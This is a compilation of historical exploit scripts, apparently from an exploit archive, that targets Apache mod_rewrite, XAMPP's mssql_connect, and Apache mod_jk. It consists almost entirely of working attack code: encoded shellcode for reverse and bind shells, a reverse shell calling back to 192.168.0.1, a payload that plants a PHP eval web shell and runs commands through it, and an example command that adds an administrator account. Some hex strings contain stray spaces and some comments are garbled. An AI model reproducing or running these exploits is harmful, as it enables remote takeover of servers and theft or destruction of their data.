"GET $target_path$pattern HTTP/1.1\r\n".
"Host: $target_host:$target_port\r\n\r\n";
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine(" Sending " .length($request) . " bytes to remote host.");
$s->Send($request);
$self->PrintLine(" Waiting for a response...");
my $r = $s->Recv(-1, 5);
$s->Close();
return;
}
1;
# [2007-03-27]
80 Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one(Win32).
#
# by axis <axis@ph4nt0m>
# http://www.ph4nt0m.org
# 2007-04-06
#
# Tested on Apache 2.0.58 (Win32)
# Windows2003 CN SP1
#
# Vulnerable Apache Versions:
# * 1.3 branch: >1.3.28 and <1.3.37
# * 2.0 branch: >2.0.46 and <2.0.59
# * 2.2 branch: >2.2.0 and <2.2.3
#
#
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# first POC by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
# http://www.enigmagroup.org/exploits/2237
#
#
#
# to successfully exploit the vuln,there are some conditions
# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html
#
#
# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat
#
# for more details about the vuln please see:
# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
#
#
# no opcodes needed under windows!
# it will directly run our shellcode
#
# my apache config file
# [httpd.conf]:
# RewriteEngine on
# RewriteRule 1/(.*) $1
# RewriteLog "logs/rewrite.log"
# RewriteLogLevel 3
#
#
# Usage:
# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141
# mod_rewrite apache off-by-one overflow
#
# [axis@opensystemX axis]$ nc -vv -n -l -p 1154
# listening on [any] 1154 ...
# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077
# Microsoft Windows [¡ã?¡À? 5.2.3790]
# (C) ¡ã?¨¨¡§?¨´¨®D 1985-2003 Microsoft Corp.
#
# D:\Apache\Apache2>exit
# exit
# sent 5, rcvd 100
#
#
#
# shellcode µÄbadchar£¬ÎÒÕâÀÃ� �Óõģ¬Æäʵ² »ÃèÒªÄÇô¶Ã
# ÎÒ¸úµ½Ã½¸öbadcharà ŠÃ‡ 0x3fºà 0x0b ÆäËû¶¼ÊÇÒÔÇ °Éú³Éshellcodeð¹ßÃ� �Ô±£ÃôµÄ
# 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b
#
echo -e "mod_rewrite apache off-by-one overflow"
if [ $# -ne 1 ] ; then
echo "Usage: $0 webserver"
exit
fi
host=$1
#use ldap:// to trigger the vuln, "Ph4nt0m" is any arbitrary string
echo -ne "GET /1/ldap://ph4nt0m/`perl -e 'print "Ph4nt0m"x5'`\
# %3f to trigger the vuln
%3fA%3fA%3f\
#string "CCCC.." is any arbitrary string, use %3f to trigger the vuln
#%90 is the machine code we will jmp to(NOP),run shellcode from here
`perl -e 'print "C"x10'`%3fC%3f%90\
# shellcode,reverse shell to 192.168.0.1 ,port 1154 alpha2 encoded
`perl -e 'print "\
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49\
\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x 51\x5a\x6a\x63\
\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x42\x32\x 42\x41\x41\x32\
\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x 79\x79\x6c\x51\
\x7a\x6a\x4b\x50\x4d\x4d\x38\x6b\x49\x79\x6f\x49\x 6f\x6b\x4f\x65\
\x30\x4c\x4b\x72\x4c\x45\x74\x51\x34\x4e\x6b\x71\x 55\x77\x4c\x6c\
\x4b\x33\x4c\x64\x45\x33\x48\x64\x41\x5a\x4f\x4c\x 4b\x72\x6f\x36\
\x78\x4c\x4b\x73\x6f\x45\x70\x66\x61\x4a\x4b\x53\x 79\x4e\x6b\x44\
\x74\x4e\x6b\x73\x31\x38\x6e\x55\x61\x79\x50\x6c\x 59\x6c\x6c\x4b\
\x34\x6f\x30\x74\x34\x34\x47\x59\x51\x5a\x6a\x76\x 6d\x76\x61\x6f\
\x32\x5a\x4b\x79\x64\x55\x6b\x33\x64\x51\x34\x41\x 38\x30\x75\x4b\
\x55\x6e\x6b\x33\x6f\x44\x64\x46\x61\x7a\x4b\x32\x 46\x6e\x6b\x34\
\x4c\x42\x6b\x6e\x6b\x73\x6f\x77\x6c\x54\x41\x58\x 6b\x43\x33\x74\
\x6c\x6c\x4b\x4d\x59\x50\x6c\x74\x64\x75\x4c\x52\x 41\x6f\x33\x50\
\x31\x6b\x6b\x72\x44\x4c\x4b\x50\x43\x66\x50\x6c\x 4b\x33\x70\x64\
\x4c\x6c\x4b\x74\x30\x65\x4c\x4e\x4d\x4e\x6b\x53\x 70\x47\x78\x33\
\x6e\x51\x78\x4c\x4e\x52\x6e\x56\x6e\x58\x6c\x50\x 50\x59\x6f\x79\
\x46\x70\x66\x62\x73\x75\x36\x75\x38\x66\x53\x64\x 72\x42\x48\x53\
\x47\x32\x53\x50\x32\x71\x4f\x71\x44\x49\x6f\x48\x 50\x52\x48\x5a\
\x6b\x48\x6d\x6b\x4c\x65\x6b\x70\x50\x4b\x4f\x68\x 56\x61\x4f\x4e\
\x69\x4a\x45\x30\x66\x6e\x61\x78\x6d\x67\x78\x73\x 32\x42\x75\x52\
\x4a\x75\x52\x6b\x4f\x7a\x70\x61\x78\x6b\x69\x55\x 59\x6c\x35\x6e\
\x4d\x51\x47\x4b\x4f\x4e\x36\x70\x53\x50\x53\x56\x 33\x76\x33\x43\
\x73\x32\x73\x31\x53\x52\x73\x6b\x4f\x4a\x70\x70\x 68\x6f\x30\x6d\
\x78\x35\x50\x46\x61\x30\x66\x30\x68\x76\x64\x6c\x 42\x33\x56\x70\
\x53\x4e\x69\x78\x61\x4c\x55\x75\x38\x4a\x4c\x58\x 79\x4c\x6a\x73\
\x50\x53\x67\x6b\x4f\x6a\x76\x73\x5a\x72\x30\x73\x 61\x53\x65\x4b\
\x4f\x6a\x70\x52\x46\x31\x7a\x52\x44\x73\x56\x50\x 68\x51\x73\x50\
\x6d\x32\x4a\x62\x70\x51\x49\x47\x59\x6a\x6c\x6c\x 49\x4b\x57\x42\
\x4a\x73\x74\x6d\x59\x6d\x32\x35\x61\x6f\x30\x48\x 73\x4f\x5a\x6f\
\x65\x4c\x49\x39\x6d\x4b\x4e\x33\x72\x54\x6d\x6b\x 4e\x33\x72\x34\
\x6c\x6c\x4d\x50\x7a\x57\x48\x4e\x4b\x4c\x6b\x6c\x 6b\x71\x78\x32\
\x52\x6b\x4e\x6c\x73\x42\x36\x49\x6f\x73\x45\x65\x 78\x6b\x4f\x6e\
\x36\x71\x4b\x42\x77\x43\x62\x53\x61\x76\x31\x70\x 51\x30\x6a\x35\
\x51\x62\x71\x76\x31\x72\x75\x43\x61\x4b\x4f\x6e\x 30\x73\x58\x4e\
\x4d\x7a\x79\x37\x75\x38\x4e\x31\x43\x4b\x4f\x4a\x 76\x30\x6a\x39\
\x6f\x6b\x4f\x70\x37\x6b\x4f\x6e\x30\x45\x38\x39\x 77\x54\x39\x79\
\x56\x71\x69\x79\x6f\x53\x45\x56\x64\x69\x6f\x69\x 46\x6b\x4f\x62\
\x57\x6b\x4c\x4b\x4f\x6a\x70\x50\x68\x6a\x50\x6f\x 7a\x37\x74\x43\
\x6f\x72\x73\x4b\x4f\x6a\x76\x79\x6f\x38\x50\x63\
"'`\
HTTP/1.0\r\n\
Host: $host\r\n\r\n" | nc -vv $host 80
# [2007-04-07]
80 XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit
<?php
print_r('
---------------------------------------------------------------------------
XAMPP for Windows <= 1.6.0a adodb.php/mssql_connect() remote buffer overflow
proof-of-concept exploit
seh overwrite method / 2000 sp3 version
mail: retrog at alice dot it
site: http://retrogod.altervista.org
---------------------------------------------------------------------------
');
/*
http://sourceforge.net/project/showfiles.php?group_id=61776
this easy to install Apache / MySQL / PHP distribution for Windows
carries various (lots) test scripts vulnerable to sql injection, but
we have here another kind of injection, adodb.php lines 62-68:
...
include_once 'adodb/adodb-errorpear.inc.php';
include_once 'adodb/adodb.inc.php';
include_once 'adodb/tohtml.inc.php';
$db = ADONewConnection($_POST['dbserver']);
@$db->Connect($_POST['host'], $_POST['user'], $_POST['password'], $_POST['database']);
echo "<p><b>DBServer: $_POST[dbserver]</b><p>";
$result = $db->Execute("SELECT * FROM $_POST[table]");
...
mssql_connect() function is vulnerable to buffer overflow and
the host argument is totally unchecked. Also this shows a vulnerabilty in
ADODB library (which is in the include path, inside PEAR folder) in the
Connect method .
If you say that this should be not used for production purpose or
exposed to the outside world, try theese google dorks:
intitle:XAMPP intitle:windows intitle:version
intitle:XAMPP intitle:version intitle:1.6.0a +windows
note: I could use the INTO OUTFILE method through sql injection
to export some shell inside the /htdocs folder because we have FILE
privilege, but we have magic_quotes_gpc on here. This is instead
possbile through the PhpMyAdmin default user/password.
note ii: PHP version is 5.2.1
note iii: bof is possible because mssql extension is enabled
by default in php.ini
*/
if ($argc<2) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host cmd OPTIONS
host: target server (ip/hostname)
cmd: a shell command
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
-S only send the second packet
Example:
php '.$argv[0].' localhost VER -P1.1.1.1:80
php '.$argv[0].' localhost NET USER sun tzu /ADD ^&^& NET LOCALGROUP
Administrators /ADD sun -p81 -S
---------------------------------------------------------------------------
');
die;
}
error_reporting(7);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) ';
function sendpacketii($packet,$want_out)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],(int)$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($want_out){
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) {
$html.=fread($ock,1);
}
}
}
fclose($ock);
}
$host=$argv[1];
$port=80;
$proxy="";
$cmd="";
$send_bof=true;
for ($i=2; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p")
and ($temp<>"-P")
and ($temp<>"-S")
){
$cmd.=" ".$argv[$i];
}
if ($temp=="-p")
{
$port=(int)str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-S")
{
$send_bof=false;
}
}
if ($proxy=='') {$p="";} else {$p='http://'.$host.':'.$port;}
//bad chars -> \x00,\x22,\x27,\x5c thoose affected by magic_quotes_gpc
//102 bytes execute command one by me...
//cmd.exe /c echo ^<?php eval($_SERVER[HTTP_C]);?^> > ./htdocs/xampp/s.php &
if ($send_bof){
$____scode=
"\xeb\x13\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4a\x53".
"\xbb\xca\x73\xe9\x77". //WinExec, kernel32.dll
"\xff\xd3\x31\xc0\xe8\xe8\xff\xff\xff\x63\x6d\x64".
"\x2e\x65\x78\x65\x20\x2f\x63\x20\x65\x63\x68\x6f".
"\x20\x5e\x3c\x3f\x70\x68\x70\x20\x65\x76\x61\x6c".
"\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x48\x54".
"\x54\x50\x5f\x43\x5d\x29\x3b\x3f\x5e\x3e\x20\x3e".
"\x20\x2e\x2f\x68\x74\x64\x6f\x63\x73\x2f\x78\x61".
"\x6d\x70\x70\x2f\x73\x2e\x70\x68\x70\x20\x26\x20".
"\xff";
//some junk to make this adjustable for sp4
//eip = ecx
$eip="\x47\x30\xE9\x77"; //0x77E93047 pop ECX - pop - retbis kernel32.dll and further ja short
$jmp="\xeb\x8b\x90\x90"; //jmp short
$____suntzu=str_repeat("\x90",1932-strlen($____scode)).$____scode."\x90\x90\x90\x90\x90\x90\x90\x90".$jmp.$eip;
$data ="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"dbserver\";\r\n\r\n";
$data.="mssql\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"host\";\r\n\r\n";
$data.="$____suntzu\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"adodb\";\r\n\r\n";
$data.="submit\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"user\";\r\n\r\n";
$data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"password\";\r\n\r\n";
$data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e\r\n";
$data.="Content-Disposition: form-data; name=\"database\";\r\n\r\n";
$data.="1\r\n";
$data.="-----------------------------7d61bcd1f033e--\r\n";
$packet ="POST $p/xampp/adodb.php HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet,0);
sleep(2);
}
echo "cmd -> ".$cmd."\n";
$packet ="GET $p/xampp/s.php HTTP/1.0\r\n";
$packet.="C: error_reporting(E_ALL);set_time_limit(0);echo \"_delim_\";passthru(\$_SERVER[HTTP_CMD]);echo \"_delim_\";\r\n";
$packet.="CMD: $cmd\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet,1);
$out=explode("_delim_",$html);
echo $out[1];
?>
# [2007-04-15]
80 Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
/*
apache mod rewrite exploit (win32)
By: fabio/b0x (oc-192, old CoTS member)
Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)
original exploit (http://enigmagroup.org/exploits/3680) only had a call back on 192.168.0.1, also
was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/
Usage: ./apache hostname rewrite_path
Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard
Example: ./apache 192.168.0.253 test
[+]Preparing payload
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Starting second stage...
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Connecting to shell
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\Apache Group\Apache2>exit
exit
[+]Owned
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define PORT 80
#define PORT2 4444
#define MAXDATASIZE 1024
char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90";
char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49"
"\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x 51\x5a\x6a\x41"
"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x51\x41\x32\x 41\x41\x32\x42"
"\x42\x42\x30\x42\x41\x58\x38\x41\x42\x50\x75\x7a\x 49\x4b\x58\x56"
"\x36\x73\x30\x43\x30\x75\x50\x70\x53\x66\x35\x70\x 56\x31\x47\x4c"
"\x4b\x50\x6c\x44\x64\x55\x48\x6c\x4b\x73\x75\x75\x 6c\x4c\x4b\x61"
"\x44\x73\x35\x63\x48\x35\x51\x4b\x5a\x6c\x4b\x50\x 4a\x37\x68\x6c"
"\x4b\x42\x7a\x77\x50\x37\x71\x4a\x4b\x6b\x53\x44\x 72\x30\x49\x6e"
"\x6b\x44\x74\x6e\x6b\x56\x61\x68\x6e\x54\x71\x39\x 6f\x6b\x4c\x70"
"\x31\x4b\x70\x6c\x6c\x67\x48\x6b\x50\x54\x34\x53\x 37\x6b\x71\x68"
"\x4f\x44\x4d\x73\x31\x78\x47\x38\x6b\x38\x72\x45\x 6b\x73\x4c\x31"
"\x34\x46\x74\x52\x55\x6b\x51\x6c\x4b\x63\x6a\x65\x 74\x56\x61\x7a"
"\x4b\x32\x46\x4c\x4b\x76\x6c\x70\x4b\x4e\x6b\x30\x 5a\x75\x4c\x67"
"\x71\x5a\x4b\x6e\x6b\x74\x44\x4e\x6b\x57\x71\x6b\x 58\x68\x6b\x76"
"\x62\x50\x31\x4b\x70\x33\x6f\x53\x6e\x31\x4d\x63\x 6b\x4b\x72\x65"
"\x58\x55\x50\x61\x4e\x31\x7a\x36\x50\x42\x79\x70\x 64\x4e\x6b\x74"
"\x59\x6e\x6b\x43\x6b\x44\x4c\x4c\x4b\x51\x4b\x77\x 6c\x4c\x4b\x35"
"\x4b\x6e\x6b\x31\x4b\x74\x48\x73\x63\x63\x58\x6c\x 4e\x70\x4e\x44"
"\x4e\x78\x6c\x79\x6f\x4b\x66\x4d\x59\x6f\x37\x4b\x 31\x78\x6c\x33"
"\x30\x77\x71\x73\x30\x47\x70\x36\x37\x53\x66\x51\x 43\x4d\x59\x69"
"\x75\x39\x78\x56\x47\x57\x70\x37\x70\x37\x70\x6e\x 70\x45\x51\x33"
"\x30\x37\x70\x4c\x76\x72\x39\x55\x48\x7a\x47\x6d\x 74\x45\x49\x54"
"\x30\x4d\x39\x38\x65\x77\x39\x4b\x36\x50\x49\x6c\x 64\x35\x4a\x52"
"\x50\x4f\x37\x6c\x64\x4c\x6d\x76\x4e\x4d\x39\x4b\x 69\x45\x59\x49"
"\x65\x4e\x4d\x78\x4b\x4a\x4d\x6b\x4c\x77\x4b\x31\x 47\x50\x53\x74"
"\x72\x61\x4f\x46\x53\x67\x42\x57\x70\x61\x4b\x6c\x 4d\x42\x6b\x75"
"\x70\x70\x51\x6b\x4f\x7a\x77\x4b\x39\x4b\x6f\x4f\x 79\x4f\x33\x4e"
"\x6d\x71\x65\x52\x34\x53\x5a\x53\x37\x30\x59\x50\x 51\x66\x33\x4b"
"\x4f\x55\x64\x4c\x4f\x6b\x4f\x66\x35\x43\x34\x50\x 59\x6e\x69\x47"
"\x74\x6c\x4e\x6a\x42\x58\x72\x54\x6b\x64\x67\x72\x 74\x39\x6f\x76"
"\x57\x6b\x4f\x50\x55\x44\x70\x30\x31\x4b\x70\x50\x 50\x30\x50\x50"
"\x50\x32\x70\x77\x30\x46\x30\x53\x70\x70\x50\x49\x 6f\x63\x65\x66"
"\x4c\x4b\x39\x4f\x37\x30\x31\x6b\x6b\x33\x63\x71\x 43\x42\x48\x54"
"\x42\x63\x30\x76\x71\x63\x6c\x4c\x49\x6d\x30\x52\x 4a\x32\x30\x32"
"\x70\x36\x37\x59\x6f\x52\x75\x71\x34\x50\x53\x70\x 57\x4b\x4f\x72"
"\x75\x44\x68\x61\x43\x62\x74\x33\x67\x59\x6f\x63\x 65\x67\x50\x4c"
"\x49\x38\x47\x6d\x51\x5a\x4c\x53\x30\x36\x70\x53\x 30\x33\x30\x4e"
"\x69\x4b\x53\x53\x5a\x43\x30\x72\x48\x53\x30\x34\x 50\x33\x30\x33"
"\x30\x50\x53\x76\x37\x6b\x4f\x36\x35\x74\x58\x6e\x 61\x4a\x4c\x67"
"\x70\x35\x54\x33\x30\x63\x30\x49\x6f\x78\x53\x41";
char finish[]= "HTTP/1.0\r\nHost: ";
char payload2[]=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x18"
"\xd9\x03\x3a\x83\xeb\xfc\xe2\xf4\xe4\xb3\xe8\x77\x f0\x20\xfc\xc5"
"\xe7\xb9\x88\x56\x3c\xfd\x88\x7f\x24\x52\x7f\x3f\x 60\xd8\xec\xb1"
"\x57\xc1\x88\x65\x38\xd8\xe8\x73\x93\xed\x88\x3b\x f6\xe8\xc3\xa3"
"\xb4\x5d\xc3\x4e\x1f\x18\xc9\x37\x19\x1b\xe8\xce\x 23\x8d\x27\x12"
"\x6d\x3c\x88\x65\x3c\xd8\xe8\x5c\x93\xd5\x48\xb1\x 47\xc5\x02\xd1"
"\x1b\xf5\x88\xb3\x74\xfd\x1f\x5b\xdb\xe8\xd8\x5e\x 93\x9a\x33\xb1"
"\x58\xd5\x88\x4a\x04\x74\x88\x7a\x10\x87\x6b\xb4\x 56\xd7\xef\x6a"
"\xe7\x0f\x65\x69\x7e\xb1\x30\x08\x70\xae\x70\x08\x 47\x8d\xfc\xea"
"\x70\x12\xee\xc6\x23\x89\xfc\xec\x47\x50\xe6\x5c\x 99\x34\x0b\x38"
"\x4d\xb3\x01\xc5\xc8\xb1\xda\x33\xed\x74\x54\xc5\x ce\x8a\x50\x69"
"\x4b\x8a\x40\x69\x5b\x8a\xfc\xea\x7e\xb1\x12\x67\x 7e\x8a\x8a\xdb"
"\x8d\xb1\xa7\x20\x68\x1e\x54\xc5\xce\xb3\x13\x6b\x 4d\x26\xd3\x52"
"\xbc\x74\x2d\xd3\x4f\x26\xd5\x69\x4d\x26\xd3\x52\x fd\x90\x85\x73"
"\x4f\x26\xd5\x6a\x4c\x8d\x56\xc5\xc8\x4a\x6b\xdd\x 61\x1f\x7a\x6d"
"\xe7\x0f\x56\xc5\xc8\xbf\x69\x5e\x7e\xb1\x60\x57\x 91\x3c\x69\x6a"
"\x41\xf0\xcf\xb3\xff\xb3\x47\xb3\xfa\xe8\xc3\xc9\x b2\x27\x41\x17"
"\xe6\x9b\x2f\xa9\x95\xa3\x3b\x91\xb3\x72\x6b\x48\x e6\x6a\x15\xc5"
"\x6d\x9d\xfc\xec\x43\x8e\x51\x6b\x49\x88\x69\x3b\x 49\x88\x56\x6b"
"\xe7\x09\x6b\x97\xc1\xdc\xcd\x69\xe7\x0f\x69\xc5\x e7\xee\xfc\xea"
"\x93\x8e\xff\xb9\xdc\xbd\xfc\xec\x4a\x26\xd3\x52\x e8\x53\x07\x65"
"\x4b\x26\xd5\xc5\xc8\xd9\x03\x3a";
int main(int argc, char *argv[])
{
int sockfd, numbytes;
char buf[MAXDATASIZE];
struct hostent *he;
struct sockaddr_in their_addr;
printf(" Exploit: apache mod rewrite exploit (win32)\n"
" By: fabio/b0x (oc-192, old CoTS member)\n"
"Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\n"
);
if (argc != 3) {
printf(" Usage: ./apache hostname rewrite_path\n");
exit(1);
}
printf("\n[+]Preparing payload\n");
char payload[748];
sprintf(payload,"GET /%s%s%s%s%s\r\n\r\n\0",argv[2],get,shellcode,finish,argv[1]);
printf("[+]Connecting...\n");
if ((he=gethostbyname(argv[1])) == NULL) {
printf("[-]Cannot resolv hostname...\n");
exit(1);
}
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-]Socket error...\n");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
if (connect(sockfd, (struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) == -1) {
printf("[-]Unable to connect\n");
exit(1);
}
printf("[+]Connected\n[+]Sending...\n");
if (send(sockfd, payload, strlen(payload), 0) == -1){
printf("[-]Unable to send\n");
exit(1);
}
printf("[+]Sent\n");
close(sockfd);
printf("[+]Starting second stage...\n");
sleep(3);
printf("[+]Connecting...\n");
if ((he=gethostbyname(argv[1])) == NULL) {
printf("[-]Cannot resolv hostname...\n");
exit(1);
}
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-]Socket error...\n");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT2);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
if (connect(sockfd, (struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) == -1) {
printf("[-]Unable to connect\n");
exit(1);
}
printf("[+]Connected\n[+]Sending...\n");
if (send(sockfd, payload2, strlen(payload2), 0) == -1){
printf("[-]Unable to send\n");
exit(1);
}
printf("[+]Sent\n[+]Connecting to shell\n");
close(sockfd);
sleep(3);
int exec;
char what[1024];
sprintf(what," nc -w 10 %s 4445",argv[1]);
exec=system(what);
if (exec!=0){
printf("[-]Not hacked\n");
} else {
printf("[+]Owned\n");
}
exit(1);
}
// [2007-05-26]
80 Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
# Apache w/ mod_jk Remote Exploit
# by eliteboy
use IO::Socket;
print "***ELiTEBOY*PRESENTZ***APACHE*MOD_JK*REMOTE*EXPLOI T***\n";
$target = $ARGV[1];
if (($#ARGV != 1) || ($target < 1) || ($target > 3)) {
print "Usage: modjkx.pl <hostname> <targettype>\n";
print "1.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.20\n"
."\tDebian 3.1/4.0*Apache 2.2.4/2.2.3&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n";
print "2.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.19\n"
."\tDebian 3.1 Sarge*Apache 2.2.4&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n";
print "3.\tFreeBSD5.4-RELEASE *** Apache 2.2.4 mod_jk-1.2.20/mod_jk-1.2.19\n";
exit;
}
$port = 80;
### lnx metasploit bindshell code port 2007
my $lnx_shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x 51\x5a\x6a\x49".
"\x58\x50\x30\x42\x31\x42\x41\x6b\x41\x41\x59\x41\x 32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x69\x 79\x37\x41\x6b".
"\x6b\x63\x63\x57\x33\x72\x73\x73\x5a\x76\x62\x32\x 4a\x55\x36\x51".
"\x48\x4e\x79\x4e\x69\x38\x61\x6a\x6d\x4f\x70\x7a\x 36\x77\x33\x30".
"\x52\x42\x46\x31\x78\x46\x67\x38\x57\x30\x66\x50\x 53\x6d\x59\x4b".
"\x51\x32\x4a\x63\x56\x70\x58\x50\x50\x50\x51\x50\x 56\x6f\x79\x4b".
"\x51\x7a\x6d\x4f\x70\x48\x30\x65\x36\x4b\x61\x4d\x 33\x38\x4d\x4b".
"\x30\x72\x72\x50\x52\x56\x36\x42\x63\x6b\x39\x68\x 61\x6e\x50\x33".
"\x56\x68\x4d\x6b\x30\x6d\x43\x70\x6a\x33\x32\x66\x 39\x6c\x70\x37".
"\x4f\x58\x4d\x6f\x70\x42\x69\x31\x69\x39\x69\x6e\x 50\x74\x4b\x46".
"\x32\x32\x48\x56\x4f\x46\x4f\x64\x33\x62\x48\x35\x 38\x56\x4f\x42".
"\x42\x30\x69\x50\x6e\x6b\x39\x4a\x43\x56\x32\x73\x 63\x4b\x39\x48".
"\x61\x68\x4d\x6d\x50\x49";
### bsd metasploit bindshell code port 5555
my $bsd_shellcode =
"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x 59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x 59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x 59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x 59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x 59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\x a4\xff\xff\xff".
"\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x 49\x49\x49\x49".
"\x49\x49\x51\x5a\x6a\x42\x58\x50\x30\x42\x30\x42\x 6b\x42\x41\x52".
"\x42\x41\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x 38\x42\x42\x50".
"\x75\x59\x79\x53\x5a\x31\x71\x33\x68\x4d\x49\x50\x 52\x32\x48\x76".
